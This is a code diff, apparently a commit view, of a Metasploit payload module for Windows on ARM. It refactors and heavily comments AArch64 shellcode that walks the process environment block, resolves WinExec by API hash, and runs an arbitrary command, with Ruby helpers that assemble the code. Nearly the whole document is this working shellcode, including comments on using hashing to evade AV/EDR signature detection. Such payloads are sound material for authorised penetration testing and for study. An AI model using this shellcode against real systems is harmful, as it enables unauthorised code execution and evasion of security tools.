@@ -14,11 +14,17 @@ def initialize(info = {})
14
14
super (
15
15
merge_info (
16
16
info ,
17
- 'Name' => 'Windows AArch64 Execute Command' ,
18
- 'Description' => 'Execute an arbitrary command on AArch64 Windows. Based on original research from Alan Foster.' ,
17
+ 'Name' => 'Windows AArch64 Command Execution' ,
18
+ 'Description' => %q{
19
+ Executes an arbitrary command on a Windows on ARM (AArch64) target.
20
+ This payload is a foundational example of position-independent shellcode for the AArch64 architecture.
21
+ It dynamically resolves the address of the `WinExec` function from `kernel32.dll` by parsing the
22
+ Process Environment Block (PEB) and the module's Export Address Table (EAT) at runtime.
23
+ This technique avoids static imports and hardcoded function addresses, increasing resilience.
24
+ } ,
19
25
'Author' => [
20
26
'alanfoster' , # Original implementation and research
21
- 'Alexander "xaitax" Hagenah'
27
+ 'Alexander "xaitax" Hagenah' # Refactoring, Improvements and Optimization
22
28
] ,
23
29
'License' => MSF_LICENSE ,
24
30
'Platform' => 'win' ,
@@ -42,184 +48,224 @@ def generate(_opts = {})
42
48
# It is based on alanfoster's original implementation.
43
49
cmd_str = datastore [ 'CMD' ] || 'calc.exe'
44
50
asm = <<~EOF
45
- // Notes:
46
- // https://devblogs.microsoft.com/oldnewthing/20220822-00/?p=107032
47
- // https://devblogs.microsoft.com/oldnewthing/20220823-00/?p=107041
48
- // https://devblogs.microsoft.com/oldnewthing/20220824-00/?p=107043
51
+ // AArch64 Windows PIC Shellcode
52
+ // -----------------------------
53
+ // Key Registers:
54
+ // x0-x7: Arguments to functions and return values.
55
+ // x18: Pointer to the Thread Environment Block (TEB) in user mode.
56
+ // x29: Frame Pointer (FP).
57
+ // x30: Link Register (LR), holds the return address for function calls.
49
58
50
59
main:
51
60
// --- Function Prologue ---
52
- // Allocate 0xb0 (176) bytes on the stack, then store the old
53
- // frame pointer (x29) and link register (x30) at the new stack top.
61
+ // Establishes a stack frame according to the AArch64 ABI.
62
+ // Allocate 0xb0 (176) bytes on the stack for local variables, saved registers, and scratch space.
63
+ // Then store the caller's frame pointer (x29) and link register (x30) at the new stack top.
54
64
stp x29, x30, [sp, #-0xb0]!
55
- // Set the new frame pointer to the current stack pointer.
65
+ // Set our new frame pointer to the current stack pointer.
56
66
mov x29, sp
57
- // Save non-volatile registers we will be using to a known offset from our new frame .
67
+ // Save non-volatile registers (x19-x21) that we will modify .
58
68
stp x19, x20, [x29, #0x10]
59
69
str x21, [x29, #0x20]
60
70
61
71
// --- API Hash Setup ---
62
- // Load the pre-calculated custom hash for kernel32.dll!WinExec into w8.
72
+ // Load the pre-calculated hash for kernel32.dll!WinExec into register w8.
73
+ // Hashing avoids using literal strings ("WinExec") in the payload, which are
74
+ // common signatures for AV/EDR.
63
75
movz w8, #0x8b31
64
76
movk w8, #0x876f, lsl #16
65
77
66
78
api_call:
67
79
// --- PEB Traversal ---
68
- // Begin walking the Process Environment Block's module list to find loaded DLLs.
80
+ // This section finds the base address of loaded modules (DLLs) in a
81
+ // position-independent way by walking structures internal to the process.
69
82
// x18 on Windows AArch64 always points to the Thread Environment Block (TEB).
70
83
ldr x10, [x18, #0x60] // x10 = TEB->ProcessEnvironmentBlock (PEB)
71
84
ldr x10, [x10, #0x18] // x10 = PEB->Ldr
72
- ldr x10, [x10, #0x20] // x10 = PEB->Ldr.InMemoryOrderModuleList.Flink (first module)
85
+ ldr x10, [x10, #0x20] // x10 = PEB->Ldr.InMemoryOrderModuleList.Flink (points to first module entry )
73
86
74
87
next_mod:
75
88
// --- Module Name Hashing ---
76
- // The LDR_DATA_TABLE_ENTRY UNICODE_STRING for the name is at +0x48 .
77
- ldr x11, [x10, #0x50] // x11 = FullDllName.Buffer pointer
78
- ldr x12, [x10, #0x4a] // x12 = FullDllName.Length (USHORT)
89
+ // For each module, calculate a hash of its name to find kernel32.dll .
90
+ ldr x11, [x10, #0x50] // x11 = LDR_DATA_TABLE_ENTRY-> FullDllName.Buffer pointer
91
+ ldr x12, [x10, #0x4a] // x12 = LDR_DATA_TABLE_ENTRY-> FullDllName.Length (USHORT)
79
92
and x12, x12, #0xffff // Ensure we only have the 16-bit length
80
- movz w13, #0 // w13 = module hash accumulator
93
+ movz w13, #0 // w13 = module hash accumulator, zero it out.
81
94
loop_modname:
82
- // This hashing loop reads one byte at a time from a UTF-16 string.
83
- ldrb w14, [x11], #0x1 // Read a byte and post-increment pointer
84
- cmp w14, #97 // Compare with ASCII 'a' for case conversion
95
+ // This hashing loop reads one byte at a time from the UTF-16 DLL name.
96
+ // It only uses the ASCII part for hashing and handles case-insensitivity.
97
+ ldrb w14, [x11], #1 // Read a byte and post-increment the pointer
98
+ cmp w14, #97 // Compare with ASCII 'a'
85
99
b.lt not_lowercase
86
- sub w14, w14, #0x20 // Convert to uppercase
100
+ sub w14, w14, #0x20 // If lowercase, convert to uppercase
87
101
not_lowercase:
88
- ror w13, w13, #13 // Rotate hash accumulator
89
- add w13, w13, w14 // Add character to hash
90
- sub w12, w12, #1 // Decrement length
102
+ ror w13, w13, #13 // Rotate the hash accumulator right by 13 bits
103
+ add w13, w13, w14 // Add the character's byte value to the hash
104
+ sub w12, w12, #1 // Decrement length counter
91
105
cmp w12, wzr
92
106
b.gt loop_modname
93
- // These extra rotates are preserved from the original implementation.
107
+ // These extra rotates are preserved from the original implementation to match the target hash .
94
108
ror w13, w13, #13
95
109
ror w13, w13, #13
96
110
97
- // Save current state to our stack frame before parsing the export table.
98
- str x10, [x29, #0x30] // Save current module's LDR_DATA_TABLE_ENTRY pointer
99
- str x13, [x29, #0x38] // Save computed module hash
111
+ // Save the current module's context (its LDR_DATA_TABLE_ENTRY pointer and its computed hash)
112
+ // to our stack frame before we start parsing its export table.
113
+ str x10, [x29, #0x30]
114
+ str w13, [x29, #0x38]
100
115
101
116
// --- PE Export Table Traversal ---
102
- ldr x10, [x10, #0x20] // x10 = DllBase (module base address)
103
- ldr w11, [x10, #0x3c] // Get e_lfanew from DOS header
104
- add x11, x10, x11 // x11 = Address of PE (NT) Header
105
-
106
- // --- Implement PE64 Magic Number Check ---
107
- // This check ensures we only attempt to parse 64-bit PE modules,
108
- // avoiding crashes if a 32-bit (WoW64) module is encountered.
109
- // The PE32+ Magic (0x020B) is found at Optional Header +0x18.
110
- ldrh w14, [x11, #0x18] // Load the Magic number from Optional Header
111
- cmp w14, #0x020b // Compare with PE32+ magic value
112
- b.ne get_next_mod_loop // If not 0x020B, skip this module ( it's 32 -bit or invalid)
113
-
114
- ldr w11, [x11, 0x88] // Get Export Table RVA from Optional Header
115
- cmp x11, #0x0 // Check if an Export Table exists
116
- b.eq get_next_mod_loop
117
- add x11, x11, x10 // x11 = Export Table Virtual Address
117
+ ldr x10, [x10, #0x20] // x10 = DllBase (the module's base memory address)
118
+ ldr w11, [x10, #0x3c] // Get e_lfanew offset from the DOS header
119
+ add x11, x10, x11 // x11 = Address of the main PE (NT) Header
120
+
121
+ // --- PE64 Magic Number Check ---
122
+ // This check is a critical robustness feature. It ensures we only attempt to parse
123
+ // 64-bit PE modules, avoiding crashes if a 32-bit (WoW64) module is encountered.
124
+ // The PE32+ Magic (0x020B) is at Optional Header +0x18.
125
+ ldrh w14, [x11, #0x18] // Load the Magic number from the Optional Header
126
+ cmp w14, #0x020b // Compare with the PE32+ magic value for 64-bit
127
+ b.ne get_next_mod_loop // If it's not a 64 -bit module, skip it.
128
+
129
+ ldr w11, [x11, # 0x88] // Get Export Address Table (EAT) RVA from Optional Header
130
+ cmp x11, #0
131
+ b.eq get_next_mod_loop // If there's no EAT, skip this module.
132
+ add x11, x11, x10 // x11 = EAT Virtual Address
118
133
str x11, [x29, #0x40] // Save EAT address to the stack
119
- ldr w12, [x11, #0x18] // w12 = NumberOfNames
120
- ldr w13, [x11, #0x20] // w13 = AddressOfNames RVA
121
- add x13, x10, x13 // w13 = AddressOfNames VA
134
+ ldr w12, [x11, #0x18] // w12 = EAT. NumberOfNames
135
+ ldr w13, [x11, #0x20] // w13 = EAT. AddressOfNames RVA
136
+ add x13, x10, x13 // w13 = EAT. AddressOfNames Virtual Address
122
137
123
138
get_next_func:
139
+ // --- Function Name Hashing ---
140
+ // Loop through all function names in the EAT.
124
141
cmp w12, #0
125
- b.eq get_next_mod_loop // If all functions checked, move to the next module
126
- sub w12, w12, #1 // Search backwards through the export names
127
- mov x14, #0x4
128
- madd x15, x12, x14, x13 // Get address of name RVA from AddressOfNames array
129
- ldr w15, [x15] // w15 = RVA of function name string
130
- add x15, x10, x15 // x15 = VA of function name string
131
- movz x5, #0 // w5 = function hash accumulator
142
+ b.eq get_next_mod_loop // If all function names checked, move to the next module.
143
+ sub w12, w12, #1 // Decrement function counter (we search backwards)
144
+ mov x14, #4
145
+ madd x15, x12, x14, x13 // Calculate address of the current function name's RVA in the name array
146
+ ldr w15, [x15] // Get the RVA of the function name string
147
+ add x15, x10, x15 // x15 = VA of the function name string
148
+ movz x5, #0 // w5 = function hash accumulator, zero it out.
132
149
loop_funcname:
133
- ldrb w11, [x15], #0x1 // Load one byte of the ASCII function name
134
- ror w5, w5, #13 // Rotate hash
135
- add w5, w5, w11 // Add character to hash
150
+ ldrb w11, [x15], #1 // Load one byte of the ASCII function name
151
+ ror w5, w5, #13
152
+ add w5, w5, w11
136
153
cmp x11, #0
137
- b.ne loop_funcname // Loop until null terminator
138
- ldr w6, [x29, #0x38] // Retrieve module hash from stack
139
- add w6, w6, w5 // Add function hash
140
- cmp w6, w8 // Compare against target hash
141
- b.ne get_next_func
154
+ b.ne loop_funcname // Loop until the null terminator is hit.
155
+ funcname_hashed:
156
+ ldr w6, [x29, #0x38] // Retrieve the saved module hash from our stack frame
157
+ add w6, w6, w5 // Combined hash = module_hash + function_hash
158
+ cmp w6, w8 // Does this match our target hash (kernel32.dll!WinExec)?
159
+ b.ne get_next_func // If not, hash the next function name.
142
160
143
161
// --- Function Address Resolution ---
162
+ // We found the correct function name. Now, we find its actual address.
144
163
found_func:
145
164
ldr x11, [x29, #0x40] // Restore EAT address from stack
146
- ldr w13, [x11, #0x24] // Get AddressOfNameOrdinals RVA
147
- add x13, x10, x13
148
- mov x14, #0x2
149
- madd x15, x12, x14, x13 // Get address of the function's ordinal
150
- ldrh w15, [x15] // Get the 16-bit ordinal
151
- ldr w13, [x11, #0x1c] // Get AddressOfFunctions RVA
152
- add x13, x10, x13
153
- mov x14, #0x4
154
- madd x15, x15, x14, x13 // Get address of the function's RVA using the ordinal
155
- ldr w15, [x15]
156
- add x15, x15, x10 // x15 = Final VA of WinExec
165
+ ldr w13, [x11, #0x24] // Get EAT. AddressOfNameOrdinals RVA
166
+ add x13, x10, x13 // VA of the ordinal table
167
+ mov x14, #2
168
+ madd x15, x12, x14, x13 // Get address of our function's ordinal
169
+ ldrh w15, [x15] // Get the 16-bit ordinal value
170
+ ldr w13, [x11, #0x1c] // Get EAT. AddressOfFunctions RVA
171
+ add x13, x10, x13 // VA of the function address table
172
+ mov x14, #4
173
+ madd x15, x15, x14, x13 // Get address of the function's RVA from the address table using the ordinal
174
+ ldr w15, [x15] // Get the function's RVA
175
+ add x15, x15, x10 // x15 = Final Virtual Address of WinExec
157
176
158
177
finish:
159
178
// --- Call WinExec ---
160
- // Set up x9 to point to a scratch buffer on our stack for the command string .
179
+ // Set up x9 to point to a scratch buffer on our stack.
161
180
add x9, x29, #0x50
162
- // create_aarch64_string_in_stack places the pointer to the CMD in x0.
181
+ // create_aarch64_string_in_stack will write the command string to the
182
+ // address in x9 and place the final pointer to the string in x0.
163
183
#{ create_aarch64_string_in_stack ( cmd_str ) }
164
- mov w1, #1 // Arg2: uCmdShow = SW_SHOWNORMAL (1)
165
- mov x8, x15 // Move target function address for the call
166
- blr x8 // Branch with Link to Register (call WinExec)
184
+ mov w1, #1 // Arg2 ( uCmdShow) = SW_SHOWNORMAL (1) - Makes the new window visible.
185
+ mov x8, x15 // Move target function address into a volatile register for the call.
186
+ blr x8 // Branch with Link to Register (call WinExec).
167
187
168
188
// --- Function Epilogue ---
189
+ // Cleanly tears down the stack frame and returns execution to the caller.
169
190
epilogue:
170
- // Restore saved registers.
191
+ // Restore saved non-volatile registers from the stack frame .
171
192
ldp x19, x20, [x29, #0x10]
172
193
ldr x21, [x29, #0x20]
173
- // Restore the original stack pointer from our frame pointer .
194
+ // Restore the original stack pointer.
174
195
mov sp, x29
175
- // Restore the original frame pointer and link register, deallocating the stack.
196
+ // Restore the caller's frame pointer and link register, deallocating our stack frame in one instruction .
176
197
ldp x29, x30, [sp], #0xb0
177
- ret // Return to the caller .
198
+ ret // Return to the address stored in the Link Register .
178
199
179
- // --- Refined Loop Control ---
200
+ // --- Loop Control for Module Iteration ---
180
201
get_next_mod_loop:
181
202
// Restore the LDR_DATA_TABLE_ENTRY pointer from the stack.
182
203
ldr x10, [x29, #0x30]
183
- // Follow the Flink pointer to the next entry in the circular list.
204
+ // The InMemoryOrderModuleList is a circular doubly-linked list.
205
+ // Following the Flink pointer gets the next module in the list.
184
206
ldr x10, [x10]
185
- // Jump back to the start of the module processing loop .
207
+ // Jump back to begin processing this next module.
186
208
b next_mod
187
209
EOF
188
210
189
211
compile_aarch64 ( asm )
190
212
end
191
213
214
+ # Generates AArch64 assembly to write a given string to the stack and return a pointer to it.
215
+ # This is a classic shellcode technique to create strings in memory at runtime.
216
+ # @param string [String] The string to be placed on the stack.
217
+ # @return [String] A block of AArch64 assembly code.
192
218
def create_aarch64_string_in_stack(string)
  # Emits AArch64 assembly text that writes `string` (plus a NUL terminator)
  # through the x9 write cursor, 8 bytes per store, and finally leaves a
  # pointer to the first byte of the string in x0.
  terminated = string + "\x00"
  dest_reg = :x0   # receives each 8-byte chunk, then the final string pointer
  cursor_reg = :x9 # post-incremented write cursor into the scratch buffer

  instructions = []
  terminated.bytes.each_slice(8) do |qword|
    # Assemble the chunk in dest_reg 16 bits at a time: movz for the lowest
    # half-word (clears the rest of the register), movk for each higher one.
    qword.each_slice(2).each_with_index do |pair, slot|
      # Bytes are reversed so the immediate reads as a little-endian half-word.
      imm = pair.reverse.map { |byte| format('%02x', byte) }.join
      instructions << if slot.zero?
                        "movz #{dest_reg}, #0x#{imm}"
                      else
                        "movk #{dest_reg}, #0x#{imm}, lsl ##{slot * 16}"
                      end
    end
    # Store the full 8-byte register and advance the cursor by 8.
    instructions << "str #{dest_reg}, [#{cursor_reg}], #8"
  end

  # The cursor now sits just past the last 8-byte store; step back by the
  # 8-byte-aligned length to recover the address of the string's first byte.
  instructions << "mov #{dest_reg}, #{cursor_reg}"
  instructions << "sub #{dest_reg}, #{dest_reg}, ##{align(terminated.bytesize)}"
  instructions.join("\n")
end
209
243
244
+ # Aligns a given value to a specified boundary (defaults to 8 bytes).
245
+ # @param value [Integer] The value to align.
246
+ # @param alignment [Integer] The alignment boundary.
247
+ # @return [Integer] The aligned value.
210
248
def align(value, alignment: 8)
  # Rounds `value` up to the next multiple of `alignment`; a value that is
  # already a multiple is returned unchanged.
  remainder = value % alignment
  remainder.zero? ? value : value + (alignment - remainder)
end
215
253
254
+ # Compiles a string of AArch64 assembly into raw binary shellcode.
255
+ # @param asm_string [String] The assembly code.
256
+ # @return [String] The compiled binary shellcode.
216
257
def compile_aarch64(asm_string)
  # Loaded here rather than at file load time, so the 'aarch64' gem is only
  # needed when this method actually runs.
  require 'aarch64/parser'

  # Comments are removed first via without_inline_comments, then the
  # remaining text is parsed and converted to its binary form.
  source = without_inline_comments(asm_string)
  ::AArch64::Parser.new.parse(source).to_binary
end
222
264
265
+ # Removes all inline comments from an assembly string, as the aarch64
266
+ # gem parser does not support them.
267
+ # @param string [String] The assembly code with comments.
268
+ # @return [String] The assembly code without comments.
223
269
def without_inline_comments(string)
  # Keeps only the code portion of each line: everything from the first `//`
  # onward is discarded, surrounding whitespace is trimmed, and lines that
  # end up empty (blank or comment-only) are dropped.
  code_lines = []
  string.each_line do |raw_line|
    code = raw_line.partition('//').first.strip
    code_lines << code unless code.empty?
  end
  code_lines.join("\n")
end
0 commit comments